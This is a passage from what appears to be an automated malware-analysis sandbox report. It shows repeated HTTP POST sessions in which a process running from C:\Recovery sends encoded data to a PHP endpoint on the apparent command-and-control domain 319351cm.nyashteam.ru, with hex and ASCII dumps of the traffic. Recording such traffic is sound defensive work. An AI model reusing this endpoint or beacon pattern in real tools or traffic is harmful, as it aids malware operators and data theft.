cfL4;desc="?proto=TCP&rtt=3578&min_rtt=1619&rtt_var=4525&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=84436&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 59 27 13 34 13 36 0b 2c 5f 3a 58 24 13 32 10 0b 5c 3a 06 24 59 36 38 29 59 3f 11 28 12 27 1a 37 14 28 3f 32 06 3c 2f 37 13 29 38 23 5b 00 13 26 18 3d 2d 35 09 2a 29 23 03 32 30 32 15 3d 36 25 05 28 2e 2c 0a 37 04 29 5d 22 03 3b 0e 24 3d 2f 53 38 1b 20 5e 28 51 2e 53 24 34 21 5e 0e 11 39 57 26 20 39 06 34 3b 3b 12 32 23 33 07 3c 07 3b 00 27 11 38 0d 2b 24 2c 1e 27 08 25 1e 30 3c 3c 11 32 03 3a 58 23 2f 34 0d 3a 16 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Y'46,_:X$2\:$Y68)Y?('7(?2</7)8#[&=-5*)#202=6%(.,7)]";$=/S8 ^(Q.S$4!^9W& 94;;2#3<;'8+$,'%0<<2:X#/4:#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.6	50077	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:14.084022045 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:14.440085888 CET	1012	OUT	Data Raw: 53 55 5f 5f 59 5f 56 5c 5c 56 52 5a 50 5b 5a 55 58 59 5b 57 50 5e 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SU__Y_V\\VRZP[ZUXY[WP^V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)2*!;(S8'+%&$Y>>+X7?2#(V/']/!Q!$
Dec 6, 2024 03:14:15.180861950 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:15.435946941 CET	815	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1rQ%2BFppBqr8OdduAjpGsj7MYAiAqTjsJCR%2B8uz6b%2BlIQ4%2BiGwa3tWOPGq63aYzz0DnQ8kHeAjHeiUSvko%2Ffep7Yqgi7i8mahuTlfQo8bvT9JE%2FSNA%2Fv61lF1IHMcgtfZ911GMruJ3eQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2e7ee9bf797-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4712&min_rtt=1590&rtt_var=6840&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=54955&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.6	50078	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:15.683368921 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue
Dec 6, 2024 03:14:16.029961109 CET	1008	OUT	Data Raw: 56 53 5a 5c 59 58 56 59 5c 56 52 5a 50 5a 5a 5d 58 5b 5b 59 50 58 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VSZ\YXVY\VRZPZZ]X[[YPXV]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)V!Y?2+V(/]1)%<+S%+"Z,#Y-T2#(.-']/!Q!
Dec 6, 2024 03:14:16.768954039 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:17.020863056 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPHzYFL3S%2BX0JykQGK8Hni%2BDKwz5HERGFoAn74hNmfp7WRg7avBv5ktoUM8iPnEerGQi0zA%2Bs9wSC5cVz1bSJect1d4duf%2BA4ekJTELCP9cfUTL4H5ID2GaE8Ya2PK9%2B8sOyUHSWA5k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2f1d8158c84-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3947&min_rtt=2080&rtt_var=4515&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1281&delivery_rate=85781&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.6	50079	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:17.260345936 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:17.608004093 CET	1012	OUT	Data Raw: 56 55 5a 5a 5c 5a 56 5d 5c 56 52 5a 50 58 5a 51 58 5f 5b 5c 50 5e 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VUZZ\ZV]\VRZPXZQX_[\P^VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>:*3?5#\2&$,4$>X= #<"19;\5;7,']/!Q!(
Dec 6, 2024 03:14:18.359049082 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:18.642322063 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRLfOpne1m3QBMUyn0%2BEDSmEQtRXCIrNmD%2BmmjvXQ707usoi1d%2FI3dRdN4jCCWKOsonAptdIaI303pTS32E6pahgkE4k7NZjTVVUFsaNOIfFPBO3DnsxrQlR3AFb1I5DoX%2BD1FkqhrY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2fbc84d8c7d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4379&min_rtt=2039&rtt_var=5446&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=70307&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.6	50080	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:18.893701077 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:19.248601913 CET	1012	OUT	Data Raw: 56 51 5f 5c 59 51 53 5f 5c 56 52 5a 50 5c 5a 5d 58 59 5b 57 50 5c 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQ_\YQS_\VRZP\Z]XY[WP\V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=3"'S(6#&;%R1,7T%(.Y-3 /!W%:?^"(;U/-']/!Q!8
Dec 6, 2024 03:14:20.031310081 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:20.290117979 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Okthp1mnLDM5BhbahTQKwrESi4nUHA7Li5DbEG8FrMwa2Mg0rloYBuBQ4KBaFJgBVnYB1JVWZ4BB17WE34XNv%2FsgxDDJo1MRlD8MYgsA4OypJ3uRmSbqMid8kV9hXbG2GlLkhtXz%2FBg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3063b8a7cea-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=31977&min_rtt=29192&rtt_var=16518&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=28362&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	50081	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:20.418051004 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:20.765708923 CET	1296	OUT	Data Raw: 56 57 5f 58 59 50 53 59 5c 56 52 5a 50 59 5a 5d 58 5b 5b 5e 50 5d 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VW_XYPSY\VRZPYZ]X[[^P]VYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!) 9X)2>58&%?S3;>[>'X7%U&*3_!+ /=']/!Q!,
Dec 6, 2024 03:14:21.543657064 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:21.829054117 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2X%2BWimirqMQbOR8ErGecir8gJwgwxcNOJ%2FyrpCTzgSM2ZeipFt23Z7Zrz%2FpKDyFiqFPBP5K4gAfqXSv2hgo3ZwrOrqGki82iyNJxHP9v7Zc6StIszziNa%2B9gcUt%2FzVFElNF0XbRVv0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c30fac6b4239-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4402&min_rtt=1693&rtt_var=6054&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=62467&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 05 27 13 09 06 22 0c 38 5f 2d 00 3c 55 31 2e 3e 04 2d 5e 2c 1b 35 15 3d 17 2b 3f 2b 0d 24 1a 2f 16 28 2c 07 12 3f 11 23 50 29 12 23 5b 00 13 25 03 3f 3d 22 14 3d 29 0d 07 26 33 29 00 3e 35 36 5b 3d 3e 05 51 23 2a 0f 5f 23 3d 2c 56 27 2d 0e 0f 2f 35 28 17 3c 0e 36 52 31 0e 21 5e 0e 11 39 55 25 20 3a 1d 23 38 2f 1d 26 1e 2c 10 28 17 30 58 26 2f 3b 50 3c 24 0e 53 30 31 07 52 24 2f 27 0b 32 03 21 07 20 11 02 0c 3a 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&'"8_-<U1.>-^,5=+?+$/(,?#P)#[%?="=)&3)>56[=>Q#*_#=,V'-/5(<6R1!^9U% :#8/&,(0X&/;P<$S01R$/'2! :#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	50082	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:20.537962914 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:20.889703035 CET	1012	OUT	Data Raw: 53 53 5f 51 59 5c 53 58 5c 56 52 5a 50 52 5a 57 58 5a 5b 56 50 5d 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SS_QY\SX\VRZPRZWXZ[VP]V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=!>"/T<82+5&;$;)>=/X#?V2"7U/=']/!Q!
Dec 6, 2024 03:14:21.643623114 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:21.883275986 CET	815	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2B3%2BaLVI9Wk0EPtc7AweG3qNl7T0UIFS0OPJ0xsxe6oY%2B1fc0qJS5k%2BT8h4HOoHBsXPiDDuDgi1SoEvXydvR8R1K33CE%2BMvLboEH7iGelAGMnFeMBn7nPm1i6%2F0a1Y%2FQFHRbuo50XkI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3104bc57c9f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3983&min_rtt=2033&rtt_var=4662&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=82794&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.6	50083	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:22.175652981 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:22.529922962 CET	1012	OUT	Data Raw: 56 50 5f 58 5c 5b 56 59 5c 56 52 5a 50 5d 5a 56 58 5f 5b 5d 50 55 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_X\[VY\VRZP]ZVX_[]PUV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E)3->1'(68%+11/8$8>Z)>#S10"+ ,-']/!Q!
Dec 6, 2024 03:14:23.297002077 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:23.591805935 CET	804	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yu8RJ4zPIPppzBBsJcbog699VIWFxzED4A1t3RavfPPfXQUrCeql5Odv9Hey8sLR%2Bf3th1MDoHP6ARtxX0lUtPBflChD5H1P2xitFyZyRxY35CSJQjizJc3X1eWowKPs03f42VukWRs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c31a88eac352-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6463&min_rtt=1766&rtt_var=10057&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=37105&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.6	50084	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:23.836137056 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:24.186253071 CET	1012	OUT	Data Raw: 56 50 5f 5a 59 50 53 58 5c 56 52 5a 50 5b 5a 52 58 5a 5b 57 50 5a 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_ZYPSX\VRZP[ZRXZ[WPZVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!3.)13<,'+6%43;)X#X!?2%$5 /-']/!Q!$
Dec 6, 2024 03:14:24.921539068 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:25.205357075 CET	802	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOJhKREB8%2FCkrJ20ugMPmfVb1REQmVGxvJRVuhy%2BVIqyiyvJB8L2ZrQ5eyC7tJRY2AuDvc6h4YONgX7zYBcacITFAHTuqlFc2nQ8CfM4AZfAnCr%2Fm3gW1HEV6RTTEQ9s2koSVtMnRaY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c324ca2842a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4072&min_rtt=1718&rtt_var=5353&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=71025&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:14:25.397062063 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	50087	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:25.883625031 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:26.233683109 CET	1012	OUT	Data Raw: 53 53 5a 5a 59 51 53 5e 5c 56 52 5a 50 5e 5a 51 58 58 5b 5b 50 5e 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZZYQS^\VRZP^ZQXX[[P^VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP")0-="/?&7\2(2&?4%;.[>0 /)R%\#5$,']/!Q!0
Dec 6, 2024 03:14:26.967984915 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:27.242645979 CET	798	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18lkoNPJrkiVLx05KXfgP7lzqjEW7490R7PO84nY3w3TWlsM4gI9qtMC4JqOcDMDunIRwSMiLIN5Yc4VJRP7IQIwlhn80Z5P4d1rQPZpldjNyS5HrsI8qivxeqrmQ9dxwbcsH%2FE0cCg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3319ce97cf3-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4193&min_rtt=1809&rtt_var=5447&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=69906&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:14:27.436570883 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	50088	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:26.985938072 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue
Dec 6, 2024 03:14:27.343214035 CET	1296	OUT	Data Raw: 56 5e 5f 5c 59 51 53 5f 5c 56 52 5a 50 53 5a 55 58 5f 5b 5d 50 55 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V^_\YQS_\VRZPSZUX_[]PUV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!==1,<%?&+%/+W0;%=?X7?)W%<!+#.-']/!Q!
Dec 6, 2024 03:14:28.081587076 CET	25	IN	HTTP/1.1 100 Continue
